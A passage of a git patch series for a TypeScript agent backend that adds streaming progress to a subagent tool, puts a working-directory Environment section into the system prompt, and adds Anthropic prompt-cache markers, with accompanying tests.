@@ -35,9 +62,11 @@ Constraints:
  * concise summary that the parent can incorporate.
  *
  * Slim port of open-agents' multi-type SUBAGENT_REGISTRY → single
- * generic subagent. Streaming progress isn't piped to the UI (the
- * parent sees one long-running tool call until completion); add an
- * async-generator execute later if live progress matters.
+ * generic subagent, but the live-progress streaming pattern is a
+ * faithful port: the execute is `async function*`, yielding
+ * `{pending, toolCallCount, usage, modelId, startedAt}` chunks
+ * throughout the subagent run and a final `{final: ModelMessage[], …}`
+ * chunk carrying the full subagent transcript for UI rendering.
  */
 export const taskTool = tool({
   description: `Launch a subagent to handle complex tasks autonomously.
@@ -66,57 +95,81 @@ IMPORTANT:
 - Include critical context (APIs, function names, file paths) in the instructions
 - The parent agent does not see the subagent's internal tool calls, only its final summary`,
   inputSchema: taskInputSchema,
-  execute: async ({ task, instructions }, { experimental_context, abortSignal }) => {
-    // Resolves to ctx.subagentModel ?? ctx.model, throwing if context
-    // wasn't populated by runAgentStep. Mirrors open-agents' task tool
-    // (`getSubagentModel(experimental_context, "task")`).
+  outputSchema: taskOutputSchema,
+  execute: async function* ({ task, instructions }, { experimental_context, abortSignal }) {
     const subagentModel = getSubagentModel(experimental_context, "task");
-
-    try {
-      // `prompt` (not `messages: []`) is required — the AI SDK records zero
-      // steps and throws NoOutputGeneratedError if the model has only a
-      // system prompt with no user turn. Mirrors open-agents' task tool.
-      const result = streamText({
-        model: subagentModel,
-        system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`,
-        prompt: "Complete this task and provide a summary of what you accomplished.",
-        tools: buildSubagentTools(),
-        stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT),
-        experimental_context,
-        abortSignal,
-      });
-
-      // Drain fullStream so the subagent actually runs to completion.
-      // Streaming progress back to the parent UI is not wired in this slim
-      // port — the parent sees one long-running tool call until the
-      // subagent finishes.
-      for await (const _part of result.fullStream) {
-        void _part;
-      }
-
-      const response = await result.response;
-      const lastAssistant = response.messages.findLast(m => m.role === "assistant");
-      const content = lastAssistant?.content;
-
-      let summary = "";
-      if (typeof content === "string") {
-        summary = content;
-      } else if (Array.isArray(content)) {
-        const lastText = content.findLast(p => p.type === "text");
-        if (lastText && "text" in lastText) summary = lastText.text;
+    const subagentModelId =
+      typeof subagentModel === "string"
+        ? subagentModel
+        : (subagentModel as { modelId?: string }).modelId;
+
+    // `prompt` (not `messages: []`) is required — the AI SDK records zero
+    // steps and throws NoOutputGeneratedError if the model has only a
+    // system prompt with no user turn. Mirrors open-agents' task tool.
+    const result = streamText({
+      model: subagentModel,
+      system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`,
+      prompt: "Complete this task and provide a summary of what you accomplished.",
+      tools: buildSubagentTools(),
+      stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT),
+      experimental_context,
+      abortSignal,
+    });
+
+    const startedAt = Date.now();
+    let toolCallCount = 0;
+    let pending: TaskPendingToolCall | undefined;
+    let usage: LanguageModelUsage | undefined;
+
+    // Emit an initial chunk so the UI can render elapsed time from a
+    // stable timestamp and show "Subagent · 0 tools · 0 tokens" before
+    // the first step finishes.
+    yield { toolCallCount, startedAt, modelId: subagentModelId };
+
+    for await (const part of result.fullStream) {
+      if (part.type === "tool-call") {
+        toolCallCount += 1;
+        pending = { name: part.toolName, input: part.input };
+        yield { pending, toolCallCount, usage, startedAt, modelId: subagentModelId };
       }
 
-      if (!summary) {
-        return {
-          success: false,
-          summary: "Subagent finished with no assistant text. The task may be incomplete.",
-        };
+      if (part.type === "finish-step") {
+        usage = sumLanguageModelUsage(usage, part.usage);
+        // Keep the last observed `pending` so task UIs don't flicker
+        // back to an initializing state between subagent steps.
+        yield { pending, toolCallCount, usage, startedAt, modelId: subagentModelId };
       }
-
-      return { success: true, summary };
-    } catch (error) {
-      const message = error instanceof Error ? error.message : String(error);
-      return { success: false, error: `Subagent failed: ${message}` };
     }
+
+    const response = await result.response;
+    const finalUsage = usage ?? (await result.totalUsage);
+    yield {
+      final: response.messages,
+      toolCallCount,
+      usage: finalUsage,
+      startedAt,
+      modelId: subagentModelId,
+    };
+  },
+  /**
+   * Extract the last assistant text from the subagent's transcript
+   * for inclusion in the parent agent's context. Mirrors open-agents'
+   * `toModelOutput` (`packages/agent/tools/task.ts`). Operates on the
+   * FINAL yielded chunk's `output.final`.
+   */
+  toModelOutput: ({ output }) => {
+    const messages = output?.final;
+    if (!messages) return { type: "text", value: "Task completed." };
+
+    const lastAssistant = messages.findLast(m => m.role === "assistant");
+    const content = lastAssistant?.content;
+    if (!content) return { type: "text", value: "Task completed." };
+
+    if (typeof content === "string") return { type: "text", value: content };
+
+    const lastTextPart = content.findLast(p => p.type === "text");
+    if (!lastTextPart) return { type: "text", value: "Task completed." };
+
+    return { type: "text", value: lastTextPart.text };
   },
 });

From f3b8954c530300b1462e193e76c256997abf8f2d Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 21:15:01 -0500
Subject: [PATCH 09/10] feat(chat-workflow): thread real cwd + currentBranch
 into system prompt (cutover Bundle A.7) (#597)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7)

Third open-agents → api cutover bundle. The handler hardcoded
`workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set
`currentBranch`, so the agent had no environment info in its system
prompt and had to run `pwd` / `git branch` on every turn.

Production verification (today, before this fix):
  agent: "My system prompt does not contain working directory or
         branch information."

After this fix the agent receives an Environment section + Current
branch line + cloud-sandbox checkpointing block — same shape as
open-agents (sandbox.recoupable.com) emits.

Changes:
- New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles
  environment section → Current branch → cloud-sandbox checkpointing
  → custom instructions, all conditional on inputs. Mirrors
  open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts).
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports
  open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}`
  placeholder substitution.
- `handleChatWorkflowStream`: connect the sandbox once for both skill
  discovery AND cwd/branch reading, then thread real values into
  `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On
  connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves
  today's behavior; tools surface real errors later when they
  reconnect).
- `runAgentStep`: build the system prompt via
  `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})`
  instead of using the static `agentCustomInstructions` directly.

Scope reduced from the original "A.7+9" bundle: dropped contextLimit
plumbing because it's a client-side display concern in open-agents,
not server-side model routing (verified via grep — open-agents'
server never reads context.contextLimit either).

Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring);
full suite 3121/3121 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(chat-workflow): drop currentBranch handling from system prompt

Per direction: branch is always `main` (the default branch) in api's
deployment topology, so the per-branch `Current branch: <name>` line
and cloud-sandbox checkpointing block don't add information today.
Strip the templating to keep the system prompt focused on what's
load-bearing (the Environment section indicating workspace-relative
paths).

- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of
  open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real
  per-session branch)
- Drop `currentBranch` from `buildAgentSystemPrompt` options +
  rendering
- Stop reading `sandbox.currentBranch` in handleChatWorkflowStream
  (the field stays on AgentContext.sandbox for type completeness;
  also consumed by createSandboxHandler unchanged)
- Remove branch-related test cases

Can be re-added later if/when meaningful per-session branches (e.g.
xx/abcdef12 generated branches) land.

Tests: 3119/3119 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call

Build failure on bf1e2451 — runAgentStep was still passing
`currentBranch: input.agentContext.sandbox.currentBranch` after
buildAgentSystemPrompt's option was removed. Stripping it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .../workflows/__tests__/runAgentStep.test.ts  | 22 ++++++++
 app/lib/workflows/runAgentStep.ts             | 12 ++++-
 .../__tests__/buildAgentSystemPrompt.test.ts  | 32 +++++++++++
 lib/chat/buildAgentSystemPrompt.ts            | 53 +++++++++++++++++++
 lib/chat/handleChatWorkflowStream.ts          | 22 ++++----
 5 files changed, 131 insertions(+), 10 deletions(-)
 create mode 100644 lib/chat/__tests__/buildAgentSystemPrompt.test.ts
 create mode 100644 lib/chat/buildAgentSystemPrompt.ts

diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts
index 429a37505..0d48f81f8 100644
--- a/app/lib/workflows/__tests__/runAgentStep.test.ts
+++ b/app/lib/workflows/__tests__/runAgentStep.test.ts
@@ -88,6 +88,28 @@ describe("runAgentStep", () => {
     expect(meta?.modelId).toBe("anthropic/claude-haiku-4.5");
   });
 
+  it("includes cwd from agentContext.sandbox in the system prompt", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({
+      ...baseInput,
+      agentContext: {
+        sandbox: {
+          state: { type: "vercel" },
+          workingDirectory: "/sandbox/mono",
+        },
+      },
+      writable: stream,
+    } as never);
+
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { system?: string };
+    expect(args.system).toMatch(/# Environment/);
+    expect(args.system).toMatch(/Working directory: \. \(workspace root\)/);
+    expect(args.system).toMatch(/workspace-relative paths/);
+  });
+
   it("the wired callback returns undefined for non-finish-step parts", async () => {
     const captured: unknown[] = [];
     vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 983bf4d7a..9d752e1a7 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -1,6 +1,7 @@
 import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai";
 import { gateway } from "@ai-sdk/gateway";
 import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
+import { buildAgentSystemPrompt } from "@/lib/chat/buildAgentSystemPrompt";
 import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext";
@@ -57,9 +58,18 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
     ...input.agentContext,
     model: callModel,
   };
+  // Build the system prompt with the sandbox's real cwd baked in
+  // (rather than a static `agentCustomInstructions` string). Without
+  // this the agent has to `pwd` on every turn because its prompt
+  // doesn't tell it where it is. Mirrors open-agents'
+  // `buildSystemPrompt`.
+  const systemPrompt = buildAgentSystemPrompt({
+    cwd: input.agentContext.sandbox.workingDirectory,
+    customInstructions: agentCustomInstructions,
+  });
   const result = streamText({
     model: callModel,
-    system: agentCustomInstructions,
+    system: systemPrompt,
     messages: modelMessages,
     tools,
     stopWhen: CHAT_AGENT_STOP_WHEN,
diff --git a/lib/chat/__tests__/buildAgentSystemPrompt.test.ts b/lib/chat/__tests__/buildAgentSystemPrompt.test.ts
new file mode 100644
index 000000000..81cb9268d
--- /dev/null
+++ b/lib/chat/__tests__/buildAgentSystemPrompt.test.ts
@@ -0,0 +1,32 @@
+import { describe, it, expect } from "vitest";
+import { buildAgentSystemPrompt } from "@/lib/chat/buildAgentSystemPrompt";
+
+describe("buildAgentSystemPrompt", () => {
+  it("emits only customInstructions when no cwd is provided", () => {
+    const prompt = buildAgentSystemPrompt({ customInstructions: "hello" });
+    expect(prompt).toBe("hello");
+    expect(prompt).not.toMatch(/Working directory/);
+  });
+
+  it("includes an Environment section when cwd is provided", () => {
+    const prompt = buildAgentSystemPrompt({ cwd: "/vercel/sandbox" });
+    expect(prompt).toMatch(/# Environment/);
+    expect(prompt).toMatch(/Working directory: \. \(workspace root\)/);
+    expect(prompt).toMatch(/workspace-relative paths/);
+  });
+
+  it("appends customInstructions AFTER the environment section", () => {
+    const prompt = buildAgentSystemPrompt({
+      cwd: "/sandbox",
+      customInstructions: "MARK_AT_END",
+    });
+    const envIdx = prompt.indexOf("# Environment");
+    const customIdx = prompt.indexOf("MARK_AT_END");
+    expect(envIdx).toBeGreaterThanOrEqual(0);
+    expect(customIdx).toBeGreaterThan(envIdx);
+  });
+
+  it("returns empty string when all options are empty", () => {
+    expect(buildAgentSystemPrompt({})).toBe("");
+  });
+});
diff --git a/lib/chat/buildAgentSystemPrompt.ts b/lib/chat/buildAgentSystemPrompt.ts
new file mode 100644
index 000000000..922273ae7
--- /dev/null
+++ b/lib/chat/buildAgentSystemPrompt.ts
@@ -0,0 +1,53 @@
+const ENVIRONMENT_SECTION = `# Environment
+
+Working directory: . (workspace root)
+Use workspace-relative paths for all file operations.`;
+
+export type BuildAgentSystemPromptOptions = {
+  /**
+   * Sandbox working directory. Triggers inclusion of the Environment
+   * section. The literal value isn't exposed to the model — the
+   * section just signals "you're in a workspace; use relative paths"
+   * (mirrors open-agents).
+   */
+  cwd?: string;
+  /**
+   * Project-specific custom instructions appended at the end of the
+   * prompt (api's existing `agentCustomInstructions` — assistant file
+   * link prompt + recoup-api skill prompt).
+   */
+  customInstructions?: string;
+};
+
+/**
+ * Assemble the system prompt for `runAgentStep`. Mirrors open-agents'
+ * `buildSystemPrompt` (`packages/agent/system-prompt.ts`) at the
+ * structural level — environment section → custom instructions — so
+ * the agent knows it's in a sandboxed workspace without having to
+ * run `pwd` on every prompt.
+ *
+ * Sections render only when their inputs are provided, so a request
+ * without sandbox context (or before sandbox boot) still produces a
+ * coherent (env-less) prompt.
+ *
+ * `currentBranch` handling deliberately omitted in this slim port —
+ * the cloud-sandbox checkpointing block in open-agents templates a
+ * `git push -u origin {branch}` example per session, but in api's
+ * deployment topology the branch is always the org repo's default
+ * (`main`), so the per-branch templating doesn't add value yet. Add
+ * back when a meaningful per-session branch lands (e.g. xx/abcdef12
+ * generated branches).
+ */
+export function buildAgentSystemPrompt(options: BuildAgentSystemPromptOptions): string {
+  const parts: string[] = [];
+
+  if (options.cwd) {
+    parts.push(ENVIRONMENT_SECTION);
+  }
+
+  if (options.customInstructions) {
+    parts.push(options.customInstructions);
+  }
+
+  return parts.join("\n\n");
+}
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index 818c70f8c..5a1c89603 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -94,18 +94,25 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
     ? (extractOrgId(session.clone_url) ?? undefined)
     : undefined;
 
-  // Connect the sandbox up-front so we can discover project-level skills
-  // before starting the workflow. The connected handle isn't passed into
-  // the workflow (it's not durably serializable) — only `sandbox.state`
-  // is. Tools reconnect via `connectVercel(state)` inside `"use step"`.
+  // Connect the sandbox up-front so we can (a) read the real working
+  // directory and (b) discover project-level skills. The connected
+  // handle isn't passed into the workflow (it's not durably
+  // serializable) — only `sandbox.state` is. Tools reconnect via
+  // `connectVercel(state)` inside `"use step"`.
+  //
+  // If connection fails we fall back to the default working directory
+  // so the workflow can still start — tools will surface the
+  // underlying failure when they try to reconnect.
   let skills: Awaited<ReturnType<typeof discoverSkills>> = [];
+  let workingDirectory: string = DEFAULT_WORKING_DIRECTORY;
   try {
     const sandbox = await connectVercel(session.sandbox_state as VercelState);
+    workingDirectory = sandbox.workingDirectory;
     const dirs = await getSandboxSkillDirectories(sandbox);
     skills = await discoverSkills(sandbox, dirs);
   } catch (error) {
     console.error(
-      "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:",
+      "[handleChatWorkflowStream] sandbox connect / skill discovery failed; continuing with defaults:",
       error,
     );
   }
@@ -119,10 +126,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
       agentContext: {
         sandbox: {
           state: session.sandbox_state as VercelState,
-          // Slim PR 4 ships the default working directory. Per-session
-          // overrides land when createChatRuntime is ported alongside
-          // the rest of the tool surface.
-          workingDirectory: DEFAULT_WORKING_DIRECTORY,
+          workingDirectory,
         },
         recoupOrgId,
         skills,

From cbcabcced0f641ca8241808fcca3176354a36fd8 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 21:46:37 -0500
Subject: [PATCH 10/10] feat(chat-workflow): Anthropic prompt cache control
 (Bundle A.6) (#599)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Fourth open-agents → api cutover bundle. runAgentStep was sending the
same system prompt + tool definitions on every turn as fresh input,
even though Anthropic prompt caching can shave 90% off subsequent
input cost. Production traces showed `cacheReadTokens: 0` on every
api turn, while open-agents shows cacheRead matching cacheWrite from
the prior turn — i.e. open-agents reuses the cached prefix.

Changes (SRP — one function per file):
- `lib/agent/contextManagement/isAnthropicModel.ts` — predicate
  port of open-agents'
  `packages/agent/context-management/cache-control.ts:5`.
- `lib/agent/contextManagement/addCacheControlToTools.ts` — marks
  the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only
  conserves Anthropic's 4-breakpoint limit.
- `lib/agent/contextManagement/addCacheControlToMessages.ts` —
  marks the LAST message with `cacheControl` on every step, per
  Anthropic's "mark the final block of the final message" guidance.

`runAgentStep` now:
- Wraps the tool set via `addCacheControlToTools(...)` before passing
  to streamText (static — set once per step).
- Adds a `prepareStep` callback that wraps `messages` via
  `addCacheControlToMessages(...)` on every internal model call.

Production behavior reproducer (Haiku 4.5, identical 2-turn prompt
to both backends):
  api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952
                     turn2 cacheWrite=0 cacheRead=0 cost=$0.005959
                     → flat cost; full input billed every turn.
  open-agents prod:  turn1 cacheWrite=10966 cacheRead=0
                     turn2 cacheWrite=12    cacheRead=10966 cost drops 12x
                     → near-full prefix re-read from cache on turn 2.

After this PR, api should match open-agents' caching curve.

Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5
addCacheControlToMessages + 2 runAgentStep wiring assertions); full
suite 3138/3138 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .../workflows/__tests__/runAgentStep.test.ts  | 53 ++++++++++++++++
 app/lib/workflows/runAgentStep.ts             | 17 ++++-
 .../addCacheControlToMessages.test.ts         | 60 ++++++++++++++++++
 .../__tests__/addCacheControlToTools.test.ts  | 63 +++++++++++++++++++
 .../__tests__/isAnthropicModel.test.ts        | 36 +++++++++++
 .../addCacheControlToMessages.ts              | 44 +++++++++++++
 .../addCacheControlToTools.ts                 | 50 +++++++++++++++
 .../contextManagement/isAnthropicModel.ts     | 26 ++++++++
 8 files changed, 348 insertions(+), 1 deletion(-)
 create mode 100644 lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts
 create mode 100644 lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts
 create mode 100644 lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts
 create mode 100644 lib/agent/contextManagement/addCacheControlToMessages.ts
 create mode 100644 lib/agent/contextManagement/addCacheControlToTools.ts
 create mode 100644 lib/agent/contextManagement/isAnthropicModel.ts

diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts
index 0d48f81f8..b2e90475b 100644
--- a/app/lib/workflows/__tests__/runAgentStep.test.ts
+++ b/app/lib/workflows/__tests__/runAgentStep.test.ts
@@ -110,6 +110,59 @@ describe("runAgentStep", () => {
     expect(args.system).toMatch(/workspace-relative paths/);
   });
 
+  it("wraps tools with anthropic cacheControl on the last tool before passing to streamText", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as {
+      tools: Record<
+        string,
+        { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }
+      >;
+    };
+    const toolNames = Object.keys(args.tools);
+    expect(toolNames.length).toBeGreaterThan(0);
+    const lastTool = args.tools[toolNames[toolNames.length - 1]!]!;
+    expect(lastTool.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" });
+    // Earlier tools should NOT carry the cache-control marker (Anthropic 4-breakpoint limit).
+    if (toolNames.length > 1) {
+      expect(args.tools[toolNames[0]!]?.providerOptions).toBeUndefined();
+    }
+  });
+
+  it("wires a prepareStep callback that marks the last message with cacheControl", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as {
+      prepareStep?: (opts: {
+        messages: Array<{ role: string; providerOptions?: Record<string, unknown> }>;
+        model: unknown;
+        steps?: unknown[];
+      }) => { messages?: unknown[] } | undefined;
+    };
+    expect(typeof args.prepareStep).toBe("function");
+    const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never;
+    const result = args.prepareStep!({
+      messages: [
+        { role: "user", content: "first" } as never,
+        { role: "user", content: "second" } as never,
+      ],
+      model: anthropicModel,
+      steps: [],
+    });
+    const out = result?.messages as Array<{ providerOptions?: Record<string, unknown> }>;
+    expect(out).toBeDefined();
+    expect(out[0]?.providerOptions).toBeUndefined();
+    expect(out[1]?.providerOptions).toEqual({ anthropic: { cacheControl: { type: "ephemeral" } } });
+  });
+
   it("the wired callback returns undefined for non-finish-step parts", async () => {
     const captured: unknown[] = [];
     vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 9d752e1a7..7ed847d5d 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -6,6 +6,8 @@ import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext";
 import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback";
+import { addCacheControlToTools } from "@/lib/agent/contextManagement/addCacheControlToTools";
+import { addCacheControlToMessages } from "@/lib/agent/contextManagement/addCacheControlToMessages";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
@@ -48,7 +50,14 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   });
 
   const modelMessages = await convertToModelMessages(input.messages);
-  const tools = buildAgentTools({ skills: input.agentContext.skills });
+  // Mark the last tool with `cacheControl: { type: "ephemeral" }` so
+  // Anthropic caches the tool-definitions block across the
+  // conversation. Per-step message caching is wired via `prepareStep`
+  // below. Mirrors open-agents' `prepareCall` + `prepareStep` split.
+  const tools = addCacheControlToTools({
+    tools: buildAgentTools({ skills: input.agentContext.skills }),
+    model: input.modelId,
+  });
   // Construct the model here (not in the workflow input) — LanguageModel
   // instances aren't JSON-serializable and can't ride durable inputs.
   // Then attach to AgentContext so tools see the same model the parent
@@ -74,6 +83,12 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
     tools,
     stopWhen: CHAT_AGENT_STOP_WHEN,
     experimental_context: agentContext,
+    // Mark the LAST message with cacheControl on every step so Anthropic
+    // incrementally caches the conversation prefix. Mirrors open-agents'
+    // `prepareStep` in `open-harness-agent.ts:100`.
+    prepareStep: ({ messages, model }) => ({
+      messages: addCacheControlToMessages({ messages, model }),
+    }),
   });
 
   // Acquire the writer once and release in `finally` so a thrown chunk
diff --git a/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts b/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts
new file mode 100644
index 000000000..19b618dca
--- /dev/null
+++ b/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts
@@ -0,0 +1,60 @@
+import { describe, it, expect } from "vitest";
+import { addCacheControlToMessages } from "@/lib/agent/contextManagement/addCacheControlToMessages";
+
+const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never;
+const openaiModel = { provider: "openai", modelId: "gpt-5" } as never;
+
+const makeMsgs = () => [
+  { role: "user", content: "first" },
+  { role: "assistant", content: "ack" },
+  { role: "user", content: "second" },
+];
+
+describe("addCacheControlToMessages", () => {
+  it("returns messages unchanged for non-Anthropic models", () => {
+    const messages = makeMsgs();
+    const result = addCacheControlToMessages({ messages: messages as never, model: openaiModel });
+    expect(result).toEqual(messages);
+  });
+
+  it("returns messages unchanged when the array is empty", () => {
+    const result = addCacheControlToMessages({ messages: [], model: anthropicModel });
+    expect(result).toEqual([]);
+  });
+
+  it("marks ONLY the last message with ephemeral cacheControl (per Anthropic guidance)", () => {
+    const messages = makeMsgs();
+    const result = addCacheControlToMessages({
+      messages: messages as never,
+      model: anthropicModel,
+    }) as Array<{ providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }>;
+    expect(result[0]?.providerOptions).toBeUndefined();
+    expect(result[1]?.providerOptions).toBeUndefined();
+    expect(result[2]?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" });
+  });
+
+  it("preserves existing providerOptions on the last message when merging the anthropic marker", () => {
+    const messages = [
+      { role: "user", content: "first" },
+      {
+        role: "user",
+        content: "second",
+        providerOptions: { openai: { foo: "bar" } },
+      },
+    ];
+    const result = addCacheControlToMessages({
+      messages: messages as never,
+      model: anthropicModel,
+    }) as Array<{ providerOptions?: Record<string, unknown> }>;
+    expect(result[1]?.providerOptions?.openai).toEqual({ foo: "bar" });
+    expect(result[1]?.providerOptions?.anthropic).toEqual({
+      cacheControl: { type: "ephemeral" },
+    });
+  });
+
+  it("does NOT mutate the input messages array", () => {
+    const messages = makeMsgs();
+    addCacheControlToMessages({ messages: messages as never, model: anthropicModel });
+    expect((messages[2] as { providerOptions?: unknown }).providerOptions).toBeUndefined();
+  });
+});
diff --git a/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts b/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts
new file mode 100644
index 000000000..af05104f2
--- /dev/null
+++ b/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts
@@ -0,0 +1,63 @@
+import { describe, it, expect } from "vitest";
+import { addCacheControlToTools } from "@/lib/agent/contextManagement/addCacheControlToTools";
+
+const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never;
+const openaiModel = { provider: "openai", modelId: "gpt-5" } as never;
+
+const makeTools = () => ({
+  bash: { description: "run bash", inputSchema: {} },
+  read: { description: "read file", inputSchema: {} },
+  write: { description: "write file", inputSchema: {} },
+});
+
+describe("addCacheControlToTools", () => {
+  it("returns tools unchanged for non-Anthropic models", () => {
+    const tools = makeTools();
+    const result = addCacheControlToTools({ tools, model: openaiModel });
+    expect(result).toEqual(tools);
+  });
+
+  it("returns tools unchanged when the toolset is empty", () => {
+    const tools = {};
+    const result = addCacheControlToTools({ tools, model: anthropicModel });
+    expect(result).toEqual({});
+  });
+
+  it("marks ONLY the last tool with ephemeral cacheControl (Anthropic's 4-breakpoint limit)", () => {
+    const tools = makeTools();
+    const result = addCacheControlToTools({ tools, model: anthropicModel }) as Record<
+      string,
+      { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }
+    >;
+    expect(result.bash?.providerOptions).toBeUndefined();
+    expect(result.read?.providerOptions).toBeUndefined();
+    expect(result.write?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" });
+  });
+
+  it("preserves existing providerOptions on the last tool when merging the anthropic marker", () => {
+    const tools = {
+      a: { description: "a", inputSchema: {} },
+      b: {
+        description: "b",
+        inputSchema: {},
+        providerOptions: { openai: { foo: "bar" } },
+      },
+    } as never;
+    const result = addCacheControlToTools({ tools, model: anthropicModel }) as Record<
+      string,
+      { providerOptions?: Record<string, unknown> }
+    >;
+    expect(result.b?.providerOptions?.openai).toEqual({ foo: "bar" });
+    expect(result.b?.providerOptions?.anthropic).toEqual({ cacheControl: { type: "ephemeral" } });
+  });
+
+  it("respects a custom providerOptions override", () => {
+    const tools = { only: { description: "x", inputSchema: {} } } as never;
+    const result = addCacheControlToTools({
+      tools,
+      model: anthropicModel,
+      providerOptions: { anthropic: { cacheControl: { type: "ephemeral_1h" } } },
+    }) as Record<string, { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }>;
+    expect(result.only?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral_1h" });
+  });
+});
diff --git a/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts b/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts
new file mode 100644
index 000000000..ffc12fb4f
--- /dev/null
+++ b/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts
@@ -0,0 +1,36 @@
+import { describe, it, expect } from "vitest";
+import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel";
+
+describe("isAnthropicModel", () => {
+  it("returns true for a string model id containing 'anthropic'", () => {
+    expect(isAnthropicModel("anthropic/claude-haiku-4.5" as never)).toBe(true);
+  });
+
+  it("returns true for a string model id containing 'claude' (no provider prefix)", () => {
